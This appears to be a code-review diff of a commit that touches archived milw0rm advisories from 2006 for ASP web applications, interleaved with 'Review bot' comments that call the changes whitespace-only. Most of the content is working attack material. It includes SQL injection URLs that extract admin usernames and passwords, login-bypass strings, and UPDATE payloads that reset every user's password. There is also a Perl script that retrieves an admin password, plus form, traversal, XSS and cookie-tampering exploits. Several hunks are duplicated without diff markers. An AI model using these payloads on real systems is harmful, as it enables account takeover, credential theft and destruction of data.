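Review bot: the old and new sides of this hunk carry identical text, so the change to this advisory file is whitespace or line-ending only and none of its content is altered; a whitespace-insensitive diff (git diff -w) would confirm that, and the same pattern recurs in the remaining hunks of this commit, so none of them should be read as a content update to the advisories.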
@ -1,22 +1,22 @@
*******************************************************************************
# Title : USupport 1.0 (detail.asp) Remote SQL Injection Vulnerability
# Author : ajann
# Vendor: http://www.superfreaker.com/
# Dork : UPublisher


*******************************************************************************

###http://[target]/[path]//detail.asp?id=[SQL]

Example:

//detail.asp?id=11%20union%20select%200,username,password,0,0,0%20from%20tblusers

"""""""""""""""""""""
# ajann,Turkey
# ...

# Im not Hacker!

# milw0rm.com [2006-11-14]
@ -1,25 +1,25 @@
*******************************************************************************
# Title : UPublisher 1.0 (viewarticle.asp) Remote SQL Injection
Vulnerability
# Author : ajann
# Dork : UPublisher
# Vendor: http://www.superfreaker.com/


*******************************************************************************

###http://[target]/[path]//viewarticle.asp?ID=[SQL]

Example:

//viewarticle.asp?ID=-1%20union%20select%200,password,username,0,0,0,0%20from%20tblusers
OR ---
//viewarticle.asp?ID=-1%20union%20select%200,0,username,password,0,0,0,0,0%20from%20tblusers

"""""""""""""""""""""
# ajann,Turkey
# ...

# Im not Hacker!

# milw0rm.com [2006-11-12]
@ -1,36 +1,36 @@
<!--

# Title : Online Event Registration <= v2.0 (save_profile.asp) Remote User Pass Change Exploit
# Author : ajann

[Code]]]
-->
<html>
<body bgcolor="#000000">
<form method="POST" action="save_profile.asp?key=1®key=">
User Name<input type="hidden" name="UserID" size="4">
<input type="text" name="UserName" size="20" class="TBox" value="Demo Account" maxlength="40">
<input type="text" name="Company" size="40" class="TBox" value="Demo Account">
Email<input type="text" name="EmailAddress" size="40" class="TBox" value="demo@codewidgets.net" maxlength="40">
Phone<input type="text" name="Phone" size="20" class="TBox" value="780-429-2318" maxlength="14">
Fax<input type="text" name="Fax" size="20" class="TBox" value="780-429-2319">
Password<input name="Password" size="20" class="TBox" value="demo" maxlength="10">
<input type="submit" value="Submit" name="B1" class="PButton">
</form>
</body>
</html>

<!--
[/Code]]]

Change: <input type="hidden" name="UserID" size="4"> => ID

Next Click "Profile"

#ajann,Turkey
#...

#Im Not Hacker!
-->

# milw0rm.com [2006-11-13]
@ -1,19 +1,19 @@
*******************************************************************************
# Title : Property Pro v1.0 (vir_Login.asp) Remote Login ByPass SQL Injection Vulnerability
# Author : ajann

*******************************************************************************
Example:

###http://[target]/[path]/admin/

UserName: ' union select 0,0 from admin


"""""""""""""""""""""
# ajann,Turkey
# ...

# Im not Hacker!

# milw0rm.com [2006-11-13]
@ -1,19 +1,19 @@
*******************************************************************************
# Title : ASP Smiley v1.0 (default.asp) Remote Login ByPass SQL Injection Vulnerability
# Author : ajann

*******************************************************************************
Example:

###http://[target]/[path]/admin/

UserName: ' union select 0,0,0,0,0,0,0,0 from categories


"""""""""""""""""""""
# ajann,Turkey
# ...

# Im not Hacker!

# milw0rm.com [2006-11-14]
@ -1,20 +1,20 @@
*******************************************************************************
# Title : NetVios <= 2.0 [News Application] (page.asp) Remote SQL Injection Vulnerability
# Author : ajann

*******************************************************************************

###http://[target]/[path]//page.asp?NewsID=[SQL]

Example:

//page.asp?NewsID=-1%20union%20select%200,0,0,logins,password,0,0,0%20from%20users%20where%20userid%20like%201


"""""""""""""""""""""
# ajann,Turkey
# ...

# Im not Hacker!

# milw0rm.com [2006-11-14]
@ -1,24 +1,24 @@
blogme v3 [admin login bypass & xss (post)]
vendor site:http://www.drumster.net/
product:blogme v3
bug:login bypass & xss (post)
risk:high


admin login bypass :
user : ' or '1' = '1
passwd: 1'='1' ro '

xss post :
in: /comments.asp?blog=85
vulnerables fields:
- Name
- URL
- Comments


laurent gaffié & benjamin mossé
http://s-a-p.ca/
contact: saps.audit@gmail.com

# milw0rm.com [2006-11-14]
@ -1,22 +1,22 @@
vendor site:http://hpe.net/
product:hpecs shopping cart
bug:injection sql
risk:high


login bypass :
username: 'or''='
passwd: 'or''='

injection sql (post) :

http://site.com/search_list.asp
variables:
Hpecs_Find=maingroup&searchstring='[sql]
( or just post your query in the search engine ... )

laurent gaffié & benjamin mossé
http://s-a-p.ca/
contact: saps.audit@gmail.com

# milw0rm.com [2006-11-14]
@ -1,57 +1,57 @@
*******************************************************************************
# Title : ASPNuke <= 0.80 (register.asp) Remote SQL Injection Vulnerability
# Author : ajann
# S.Page : http://www.aspnuke.com
# D.Page : http://sourceforge.net/project/showfiles.php?group_id=92470

*******************************************************************************

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
ASP Nuke
Kenneth W. Richards
Orvado Technologies
-Introduction-

ASP Nuke is an open-source software application for running a
community-based web site on a web server.
By open-source, we mean the code is freely available for others to read,
modify and use in accordance
with the software license.
ASP Nuke is an extensible framework that allows you to upgrade and add
applications to the website quickly
and easily. It uses a modular architecture allowing others to rapidly
develop new modules and site operators
to re-organize the layout and navigation for their site.
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Vulnerability::
_________________

###http://[target]/[path]//module/account/register/register.asp?StateCode=[SQL]&..&..&..&..&..&..&..&..&....

Example = Poll Update

///module/account/register/register.asp?StateCode=0',0,0,0,0,0);update%20tblPoll%20set%20Question%20=%20'hacked'--&FirstName=namename1&LastName=namename2&Username=abcdefghijk&Password=1234567890&Confirm=1234567890&Address1=kro.mahallesi&Address2=kro.apt&City=aaaaaaaaa&ZipCode=101010101&CountryID=0&Email=mailmail@mailbidaamail.com&Action=ADD&_dummy=Register

Note: Change UserName because ; failed:already username dont write.

Some tables,columns
___________________

[tblMember] | [FaqQuestion]
MemberID | QuestionID
Username | DocumentID
Password | Question
Firstname | Answer
Middlename | Active
EmailAddress | OrderNo
.. | ..


"""""""""""""""""""""
# ajann,Turkey
# ...

# Im not Hacker!

# milw0rm.com [2006-11-19]
@ -1,58 +1,58 @@
#!/usr/bin/perl
#[Script Name: fipsCMS <= v4.5 (index.asp) Remote SQL Injection Exploit
#[Coded by : ajann
#[Author : ajann
#[Contact : :(

use IO::Socket;
if(@ARGV < 3){
print "
[========================================================================
[// fipsCMS <= v4.5 (index.asp) Remote SQL Injection Exploit
[// Usage: exploit.pl [target] [path] [userid]
[// Example: exploit.pl victim.com / 1
[// Example: exploit.pl victim.com /path/ 1
[// Vuln&Exp : ajann
[========================================================================
";
exit();
}
#Local variables
$server = $ARGV[0];
$server =~ s/(http:\/\/)//eg;
$host = "http://".$server;
$port = "80";
$dir = $ARGV[1];
$file = "index.asp?lg=1&w=forumshow&fcat=-1&fansweres=True&froot=1&fid=";
$target = "-1%20union%20select%200,0,0,0,0,adminpword,0,0,0,0,0,0%20from%20admin%20where%20adminid%20like%20".$ARGV[2];
$target = $host.$dir.$file.$target;

#Writing data to socket
print "+**********************************************************************+\n";
print "+ Trying to connect: $server\n";
$socket = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$server", PeerPort => "$port") || die "\n+ Connection failed...\n";
print $socket "GET $target HTTP/1.1\n";
print $socket "Host: $server\n";
print $socket "Accept: */*\n";
print $socket "Connection: close\n\n";
print "+ Connected!...\n";
#Getting
while($answer = <$socket>) {
if ($answer =~ /\"150\" value=\"Re:(.*?)class=\"/){
print "+ Exploit succeed! Getting admin information.\n";
print "+ ---------------- +\n";
print "+ Password: $1\n";
exit();
}

if ($answer =~ /Internal Server Error/) {
print "+ Exploit Failed : ( \n";
print "+**********************************************************************+\n";
exit();
}
}

print "+ Exploit failed :(\n";
print "+**********************************************************************+\n";

# milw0rm.com [2006-11-22]
@ -1,24 +1,24 @@
*******************************************************************************
# Title : fipsGallery <= v1.5 (index1.asp) Remote SQL Injection Vulnerability
# Author : ajann
# Contact : :(
# $$$ : 29 Euro


*******************************************************************************

###http://[target]/[path]//index1.asp?what=artists&which=[SQL]

Example:

//index1.asp?what=artists&which=-1%20union%20select%200,username,password%20from%20admin

See you Admin Hash..

"""""""""""""""""""""
# ajann,Turkey
# ...

# Im not Hacker!

# milw0rm.com [2006-11-22]
@ -1,22 +1,22 @@
*******************************************************************************
# Title : fipsForum <= v2.6 (default2.asp) Remote SQL Injection Vulnerability
# Author : ajann
# Contact : :(

*******************************************************************************


###http://[target]/[path]//default2.asp?kat=[SQL]

Example:

//default2.asp?kat=-1%20union%20select%200,pw_admin%20from%20config


"""""""""""""""""""""
# ajann,Turkey
# ...

# Im not Hacker!

# milw0rm.com [2006-11-22]
@ -1,23 +1,23 @@
*******************************************************************************
# Title : Liberum Help Desk <= 0.97.3 (details.asp) Remote SQL Injection Vulnerability
# Author : ajann
# Contact : :(
# Dork : "Liberum Help Desk, Copyright (C) 2001 Doug Luxem. Please view the license

*******************************************************************************

###http://[target]/[path]//details.asp?id=[SQL]

Example:

//details.asp?id=2)%20update%20tblusers%20set%20password='kro'--

=> All Password Changed to "kro"

"""""""""""""""""""""
# ajann,Turkey
# ...

# Im not Hacker!

# milw0rm.com [2006-11-25]
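Review bot: the example in this hunk is a state-changing UPDATE rather than a read-only extraction, as the advisory's own line `=> All Password Changed to "kro"` states, yet the header only reads "Remote SQL Injection Vulnerability"; the title or a header field should mark the PoC as destructive so a reader does not mistake it for a harmless verification query like the SELECT-based examples in the neighbouring advisories.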
@ -1,12 +1,12 @@
# Title : basicforum v 1.1 (edit.asp) Remote SQL Injection Vulnerability
# Author : bolivar
# Dork : "This script created by www.script.canavari.com"

---------------------------------------------------------------------------

http://[target]/[path]/edit.asp?type=message&id=-1+union+select+kullanici,sifre+from+uyeler

---------------------------------------------------------------------------
# Just for Fun!!

# milw0rm.com [2006-11-25]
@ -1,32 +1,32 @@
**************************************************************************************************
# Title : ASP-Nuke Community <= v1.5 Cookie Modification Privilege Escalation Vulnerability
# Author : ajann
# S.Page : http://www.rot.dk
# D.Page : http://www.rot.dk/aspnuke/downloads.asp
# Greetz : Nukedx
**************************************************************************************************

Cookie
----------

Open the Cookie Editor=>
Find cookie informations.
Change Informations=

Cookie Informations:

ASPNUKE14%5Fpseudoname , pseudoname => "Welcome *USERNAME*" see for
ASPNUKE14%5Fpseudo , pseudo => Login UserName
ASPNUKE14%5Fpseudoid , pseudoid => UserId
ASPNUKE14%5Femail , email => User Email

Save and go to default.asp.


"""""""""""""""""""""
# ajann,Turkey
# ...

# Im not Hacker!

# milw0rm.com [2006-11-25]
**************************************************************************************************
# Title : ASP-Nuke Community <= v1.5 Cookie Modification Privilege Escalation Vulnerability
# Author : ajann
# S.Page : http://www.rot.dk
# D.Page : http://www.rot.dk/aspnuke/downloads.asp
# Greetz : Nukedx
**************************************************************************************************

Cookie
----------

Open the Cookie Editor=>
Find cookie informations.
Change Informations=

Cookie Informations:

ASPNUKE14%5Fpseudoname , pseudoname => "Welcome *USERNAME*" see for
ASPNUKE14%5Fpseudo , pseudo => Login UserName
ASPNUKE14%5Fpseudoid , pseudoid => UserId
ASPNUKE14%5Femail , email => User Email

Save and go to default.asp.


"""""""""""""""""""""
# ajann,Turkey
# ...

# Im not Hacker!

# milw0rm.com [2006-11-25]
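Review bot: All 32 lines on the old and new sides of this hunk are identical as rendered, so no content change is visible and `git diff -w` should show nothing for this file; if the rewrite is a line-ending normalisation of the archive, say so in the commit message so that the no-op rewrites can be told apart from substantive edits. For the archive's own classification, the entry's four cookie names (`ASPNUKE14%5Fpseudo`, `ASPNUKE14%5Fpseudoid`, `ASPNUKE14%5Femail`, `ASPNUKE14%5Fpseudoname`) document the defect the title names: identity taken straight from client-controlled cookie values with no server-side session binding, which is the condition a defender should look for when assessing similar legacy ASP applications.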
@ -1,12 +1,12 @@
# Title : simpleblog <= v 2.3 (/admin/edit.asp) Remote SQL Injection Vulnerability
# Author : bolivar
# Dork : "SimpleBlog 2.3 by 8pixel.net"

---------------------------------------------------------------------------

http://[target]/[path]/admin/edit.asp?id=-1+union+select+0,uUSERNAME,uPASSWORD,0,0,0,0,0,0+from+t_users

---------------------------------------------------------------------------
# Just for Fun!!

# milw0rm.com [2006-11-26]
# Title : simpleblog <= v 2.3 (/admin/edit.asp) Remote SQL Injection Vulnerability
# Author : bolivar
# Dork : "SimpleBlog 2.3 by 8pixel.net"

---------------------------------------------------------------------------

http://[target]/[path]/admin/edit.asp?id=-1+union+select+0,uUSERNAME,uPASSWORD,0,0,0,0,0,0+from+t_users

---------------------------------------------------------------------------
# Just for Fun!!

# milw0rm.com [2006-11-26]
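Review bot: This 12-line hunk also shows no textual difference between its two sides, so it is another whitespace-only rewrite; such no-op rewrites of archived entries should be batched into their own commit and labelled as such rather than mixed in with substantive changes, otherwise the real edits in the same commit are hard to locate in review.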
@ -1,39 +1,39 @@
*******************************************************************************
# Title : Ultimate HelpDesk All Version (Source/XSS) Vulnerabilities
# Author : ajann
# Contact : :(

*******************************************************************************

Login Before Vulnerabilities.:


[[SOURCE]]]------------------------------------------------------

http://[target]/[path]//getfile.asp?filename=[SQL]

Example:

//getfile.asp?filename=../index.asp
//getfile.asp?filename=../../../boot.ini

[[/SOURCE]]]


[[XSS]]]---------------------------------------------------------

http://[target]/[path]//index.asp?status=open&page=tickets&title=39&searchparam=&u_input=&u_field=&intpage=2&keyword=[XSS]

Example:

//index.asp?status=open&page=tickets&title=39&searchparam=&u_input=&u_field=&intpage=2&keyword=%22%3E%3Cscript%3Ealert%28%27ajann%27%29%3B%3C%2Fscript%3E

[[/XSS]]]

"""""""""""""""""""""
# ajann,Turkey
# ...

# Im not Hacker!

# milw0rm.com [2006-12-01]
*******************************************************************************
# Title : Ultimate HelpDesk All Version (Source/XSS) Vulnerabilities
# Author : ajann
# Contact : :(

*******************************************************************************

Login Before Vulnerabilities.:


[[SOURCE]]]------------------------------------------------------

http://[target]/[path]//getfile.asp?filename=[SQL]

Example:

//getfile.asp?filename=../index.asp
//getfile.asp?filename=../../../boot.ini

[[/SOURCE]]]


[[XSS]]]---------------------------------------------------------

http://[target]/[path]//index.asp?status=open&page=tickets&title=39&searchparam=&u_input=&u_field=&intpage=2&keyword=[XSS]

Example:

//index.asp?status=open&page=tickets&title=39&searchparam=&u_input=&u_field=&intpage=2&keyword=%22%3E%3Cscript%3Ealert%28%27ajann%27%29%3B%3C%2Fscript%3E

[[/XSS]]]

"""""""""""""""""""""
# ajann,Turkey
# ...

# Im not Hacker!

# milw0rm.com [2006-12-01]
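Review bot: The 39 lines on each side of this hunk are identical, so again nothing but whitespace or line endings changed. One documentation point on the file itself, visible in the `[[SOURCE]]` section: the template line `getfile.asp?filename=[SQL]` labels the parameter as SQL, while both examples (`../index.asp`, `../../../boot.ini`) are directory traversal reading arbitrary files; if entry metadata is being corrected in this commit, a placeholder such as `[PATH]` would stop classification tooling from tagging this as SQL injection and would let defenders searching the archive for path-traversal precedents find it.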
@ -1,28 +1,28 @@
*************************************************************************************
# Title : SpotLight CRM 1.0 (login.asp) | Remote SQL Injection Vulnerability
# Author : ajann
# Contact : :(
# $$$ : $2,499

*************************************************************************************


[[SQL]]]

###http://[target]/[path]//login.asp=[POST SQL]

Example:
-> All User UserName And Password Changed "kro"

// login.asp UserName: ';update login set password='kro'--
// login.asp UserName: ';update login set loginName='kro'--

[[/SQL]]]

"""""""""""""""""""""
# ajann,Turkey
# ...

# Im not Hacker!

# milw0rm.com [2006-12-09]
*************************************************************************************
# Title : SpotLight CRM 1.0 (login.asp) | Remote SQL Injection Vulnerability
# Author : ajann
# Contact : :(
# $$$ : $2,499

*************************************************************************************


[[SQL]]]

###http://[target]/[path]//login.asp=[POST SQL]

Example:
-> All User UserName And Password Changed "kro"

// login.asp UserName: ';update login set password='kro'--
// login.asp UserName: ';update login set loginName='kro'--

[[/SQL]]]

"""""""""""""""""""""
# ajann,Turkey
# ...

# Im not Hacker!

# milw0rm.com [2006-12-09]
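Review bot: Identical 28 lines on both sides, so this is a no-op rewrite as well. Worth recording in the entry's metadata rather than in the hunk: the two example payloads are destructive (`update login set password='kro'--` and `update login set loginName='kro'--` carry no WHERE clause, and the entry itself says every user's name and password are changed), and the template line `###http://[target]/[path]//login.asp=[POST SQL]` is not a well-formed request description. Anyone using this archive for assessment work should see a "destructive, unverified" marker on such entries so the file is treated as a historical record, not a safe test case.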
@ -1,30 +1,30 @@
*************************************************************************************
# Title : Request For Travel 1.0 (product) | Remote SQL Injection Vulnerability
# Author : ajann
# Contact : :(
# $$$ : $8,000

*************************************************************************************


[[SQL]]]

###http://[target]/[path]//ProductDetails.asp=[SQL]

Example:
-> All News Title Changed to = "kro"

//ProductDetails.asp?from=desc&mod=region&CID=-1&RID=-1&PID=-1;update%20gtsNews%20set%20NewsTitle='kro'--

-> Just NewsId Title Changed to = "kro"
//ProductDetails.asp?from=desc&mod=region&CID=-1&RID=-1&PID=-1;update%20gtsNews%20set%20NewsTitle='kro'%20where%20NewsID=2--

[[/SQL]]]

"""""""""""""""""""""
# ajann,Turkey
# ...

# Im not Hacker!

# milw0rm.com [2006-12-09]
*************************************************************************************
# Title : Request For Travel 1.0 (product) | Remote SQL Injection Vulnerability
# Author : ajann
# Contact : :(
# $$$ : $8,000

*************************************************************************************


[[SQL]]]

###http://[target]/[path]//ProductDetails.asp=[SQL]

Example:
-> All News Title Changed to = "kro"

//ProductDetails.asp?from=desc&mod=region&CID=-1&RID=-1&PID=-1;update%20gtsNews%20set%20NewsTitle='kro'--

-> Just NewsId Title Changed to = "kro"
//ProductDetails.asp?from=desc&mod=region&CID=-1&RID=-1&PID=-1;update%20gtsNews%20set%20NewsTitle='kro'%20where%20NewsID=2--

[[/SQL]]]

"""""""""""""""""""""
# ajann,Turkey
# ...

# Im not Hacker!

# milw0rm.com [2006-12-09]
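Review bot: The 30 lines on each side of this hunk match exactly, so this file too changed only in whitespace or line endings; the same `git diff -w` check applies. As with the previous entry, the first example (`update%20gtsNews%20set%20NewsTitle='kro'--` with no WHERE) rewrites every row of the table, and the entry describes a stacked-query injection reached through GET parameters, so the archive metadata should carry the same destructive marker; from a defensive reading, the `PID=-1;update ...` form is a useful signature for web-log detection of stacked statements in numeric parameters.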
Some files were not shown because too many files have changed in this diff.